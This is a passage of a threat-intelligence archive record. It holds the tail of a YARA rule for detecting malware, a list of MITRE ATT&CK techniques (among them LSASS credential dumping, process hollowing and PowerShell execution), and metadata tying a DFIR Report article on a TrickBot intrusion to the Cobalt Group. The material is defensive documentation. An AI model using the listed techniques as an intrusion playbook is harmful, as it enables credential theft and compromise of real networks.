ascii\r\ncondition:\r\nuint16(0) == 0x5a4d and filesize \u003c 2000KB and\r\n( pe.imphash() == \"ae9182174b5c4afd59b9b6502df5d8a1\" or 8 of them )\r\n}\r\nMITRE\r\nT1055.012 – Process Injection: Process Hollowing\r\nT1053.005 – Scheduled Task/Job: Scheduled Task\r\nT1059.001 – Command and Scripting Interpreter: PowerShell\r\nT1071.001 – Application Layer Protocol: Web Protocols\r\nT1003.001 – OS Credential Dumping: LSASS Memory\r\nT1444 – Masquerade as Legitimate Application\r\nT1069 – Permission Groups Discovery\r\nT1018 – Remote System Discovery\r\nT1082 – System Information Discovery\r\nT1016 – System Network Configuration Discovery\r\nT1033 – System Owner/User Discovery\r\nT1482 – Domain Trust Discovery\r\nT1134 – Access Token Manipulation\r\nT1105 – Ingress Tool Transfer\r\nT1046 – Network Service Scanning\r\nT1047 – Windows 
Management Instrumentation\r\nInternal case #4778\r\nSource: https://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/"
	],
	"report_names": [
		"trickbot-leads-up-to-fake-1password-installation"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434885,
	"ts_updated_at": 1775791229,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a87f3838ccb83a662cb6942ae497605be74aeacb.pdf",
		"text": "https://archive.orkl.eu/a87f3838ccb83a662cb6942ae497605be74aeacb.txt",
		"img": "https://archive.orkl.eu/a87f3838ccb83a662cb6942ae497605be74aeacb.jpg"
	}
}